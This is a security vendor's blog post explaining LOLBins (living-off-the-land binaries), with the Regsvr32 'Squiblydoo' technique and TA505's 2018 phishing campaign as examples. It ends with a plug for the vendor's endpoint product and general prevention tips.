The next few days Seqrite will publish descriptive blogs about the forecasts from its ‘Seqrite Predictions 2020: Cyberthreats’ with the aim of educating readers about what individual threats mean. We begin with the prediction titled, ‘Increased use of LOLBins’ in the report.
As the name sounds, there is nothing humorous about LOLBins. Unlike the common parlance of ’LOL’, in this case, LOL refers to ‘Living off the Land’ and LOLBins refer to a particular type of attack technique that is creating a lot of chaos among enterprises.
The full form of LOLBin is ‘Living Off the Land Binaries’ and they refer to Windows binaries that are non-malicious in nature but are used by attackers to hide malicious activity. This is an extremely crafty way to conduct an attack without leaving any traces as the malicious activity is hidden by regular binaries. As attackers are using legitimate and benign binaries located within the operating system to hide their malicious activity, they are effectively evading cyber defences.
Exploiting legitimate files for malware
That is how LOLBins justify their name of ‘living off the land’ — using this technique, attackers do not need to inject malicious files or software in Operating Systems. Instead, they can exploit legitimate Microsoft files to conduct malicious activities like DLL hijacking, hiding payloads, process downloading, executing code and stealing passwords.
Two examples illustrate how LOLBins are used. A particular type of attack, nicknamed the Squiblydoo attack, utilizes a common Windows utility called Regsvr32.exe which is present in every Windows system and is used by power users to edit the Registry.
Using Regsvr32, malicious elements can bypass a system’s existing Application Whitelisting processes and execute malicious code that would otherwise be blocked. Hence, the system’s existing security defences are bypassed and cybercriminals can escalate their hold over a system.
LOLBins were also used in a targeted phishing campaign in 2018. The TA505 group ran a spear-phishing campaign against financial institutions using a backdoor. They used LOLBins and took advantage of legitimate Windows bundles like msiexec.exe, rundll32.exe and net.exe to deliver its malware payload, stealthily evading detection.
Used in conjunction with fileless malware
For enterprises dealing with the twofold threat posed by fileless malware and LOLBins, it is imperative to deploy an advanced enterprise security solution that can neutralize such threats. Seqrite’s Endpoint Security Enterprise Suite recently received a BEST+++ Certificate from AVLab, an independent organization that conducts tests on security software for corporate networks and individual user devices, on the Fileless Malware Protection Test.
Other ways in which enterprises can prevent such threats include:
- Maintaining operating system software and enterprise applications by keeping them updated. In reference to this, enterprises using Windows 7 should seriously consider upgrading to Windows 10 as Microsoft no longer offers support for Windows 7
- Ensuring websites that are advertisement-heavy and are resource-intensive are not used by their enterprises
- Ensuring that software on enterprise systems is only installed from legitimate sources
- Maintaining regular and timely backups of enterprise data